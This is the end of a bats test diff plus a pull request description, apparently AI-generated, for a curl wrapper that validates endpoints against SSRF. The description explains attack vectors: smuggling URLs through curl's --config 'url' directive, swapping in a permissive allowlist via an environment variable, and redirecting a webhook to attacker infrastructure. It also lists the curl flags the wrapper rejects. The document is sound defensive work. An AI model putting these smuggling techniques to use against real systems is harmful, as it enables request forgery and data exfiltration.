+    [[ "$status" -eq 0 ]]
+    # If no --config-auth was supplied, the wrapper MUST NOT inject a stray
+    # --config arg into curl (which would then fail to read the missing file).
+    ! grep -qE '^--config$' "$MOCK_CURL_ARGV_LOG"
+}


### PR DESCRIPTION
## Summary

Sprint-1E.c.3.a — first sub-slice of the cycle-099 bash caller migration that finally wires the centralized endpoint validator (built up in 1E.b / 1E.c.1 / 1E.c.2) into production code. Closes the SSRF surface for 3 of ~15 callers; remaining ~11 deferred to 1E.c.3.b/.c.

- New `endpoint_validator__guarded_curl` helper in `.claude/scripts/lib/endpoint-validator.sh` (~250 LOC). Validates URL via Python canonical, then exec curl with hardened defaults (`--proto =https / --proto-redir =https / --max-redirs 10`).
- Caller-controlled flags `--allowlist <PATH>` (tree-restricted to `.claude/scripts/lib/allowlists/`), `--config-auth <FILE>` (content-gated to `header = "..."` lines only — defends against `curl --config` URL smuggling), `--url <URL>`.
- 3 per-caller allowlist fixtures: `loa-providers.json` (model APIs), `loa-anthropic-docs.json` (oracle), `openai.json` (lib-curl-fallback).
- Migrated callers: `model-health-probe.sh` (2 of 3 sites; webhook keeps raw curl with `[ENDPOINT-VALIDATOR-EXEMPT]` rationale), `anthropic-oracle.sh` (`fetch_source`), `lib-curl-fallback.sh::call_api` (transitively migrates `gpt-review-api.sh`).

## Smuggling Defenses (Subagent Dual-Review Findings)

Cypherpunk paranoid review identified 1 CRITICAL + 2 HIGH; both addressed pre-merge:

- **CRITICAL** — `curl --config` lets a tampered auth tempfile smuggle additional URLs past the allowlist via `url = "..."` directives in the config file (curl appends them to the URL queue). `lib-security.sh::write_curl_auth_config` already validates inputs against newline injection, so the realistic vector requires filesystem-write access — but defense-in-depth is right: the wrapper now requires `--config-auth` (content-gated) for auth files and **rejects** caller-passed `--config` / `-K` / `--next` / `-:` outright.
- **HIGH** — Allowlist path was unrestricted; an attacker who controls env vars (e.g., `LOA_PROBE_PROVIDERS_ALLOWLIST=/tmp/wide-open.json`) could substitute a permissive allowlist. The wrapper now `realpath -e`-resolves the path and rejects anything outside `.claude/scripts/lib/allowlists/` (tests opt in via `LOA_ENDPOINT_VALIDATOR_TEST_MODE=1` + `LOA_ENDPOINT_VALIDATOR_TEST_ALLOWLIST_DIR`).
- **HIGH** (deferred to 1E.c.3.b) — Allowlist host wildcard semantics not validated at load time; `host: "*"` would silently match everything. Python validator change scope; doesn't affect this sub-sprint.
- **MEDIUM** — Webhook (model-health-probe alert URL) keeps raw curl; in repos where `.loa.config.yaml` is git-tracked, a hostile PR could pivot to attacker infra. Body is already redacted; URL choice is audited via PR review. Body of webhook is already redacted via `_redact_secrets`. Deferred: opt-in webhook-host allowlist as `.claude/scripts/lib/allowlists/webhook-hosts.json` (1E.c.3.b).
- General-purpose review: APPROVE, with one LOW (validator-rejection stderr was swallowed; now captured to a tempfile and emitted via `log_warn` for SSRF-rejection visibility) addressed in `model-health-probe.sh`.

## Test plan

- [x] `bats tests/integration/endpoint-validator-guarded-curl.bats` — 42 new tests (G1-G8 wrapper invariants + S1 smuggling-flag rejection + S2 --config-auth content gate + T1 allowlist tree-restriction)
- [x] `bats tests/integration/endpoint-validator-cross-runtime.bats` — 72 tests, 0 regressions
- [x] `bats tests/integration/endpoint-validator-dns-rebinding.bats` — 27 tests, 0 regressions
- [x] `bats tests/integration/endpoint-validator-ts-parity.bats` — 37 tests, 0 regressions
- [x] `bats tests/unit/model-health-probe*.bats tests/unit/bedrock-health-probe.bats tests/unit/gpt-review-api.bats` — 124 tests, 0 regressions
- [x] `bash -n` clean on all 4 modified scripts
- [x] End-to-end smoke with real `write_curl_auth_config` auth tempfile + `--config-auth` (argv ordering verified: hardened defaults / `--config <auth>` / caller args / `--url <URL>`)
- [x] End-to-end smoke with hostile URL (rejected with `ENDPOINT-NOT-ALLOWED` and curl never invoked, exit 78)

**Cumulative cycle-099 endpoint-validator coverage**: 178 tests (72 cross-runtime + 27 dns-rebinding + 37 ts-parity + 42 guarded-curl). Total post-migration: 302 tests across 9 relevant suites passing (0 regressions).

## Deferred follow-ups

- **1E.c.3.b**: migrate remaining ~11 scripts (`flatline-{semantic-similarity,learning-extractor,proposal-review,validate-learning,error-handler}.sh`, `constructs-*.sh`, `check-updates.sh`, `license-validator.sh`, `lib-curl-fallback.sh-style helpers`, `mount-loa.sh`)
- **1E.c.3.b**: webhook-host allowlist for `model_health_probe.alert_webhook_url` (opt-in via `.loa.config.yaml`)
- **1E.c.3.c**: flip CI guard in `.github/workflows/cycle099-sprint-1e-b-tests.yml` from informational scan to STRICT (curl/wget outside endpoint-validator.sh fails build); remove `lint-pre-existing-curl.txt` baseline if no entries left
- **HIGH-2**: reject `host: "*"` / `host: ""` at load time in `load_allowlist` (Python canonical)
- **MEDIUM (curl pinning)**: pin `LOA_CURL_BIN` to `/usr/bin/curl` instead of relying on `command -v curl` (portability vs. defense tradeoff; deferred)
- **LOW (subprocess DoS)**: batch-validate or document a probe-interval floor for hot-loop callers

🤖 Generated with [Claude Code](https://claude.com/claude-code)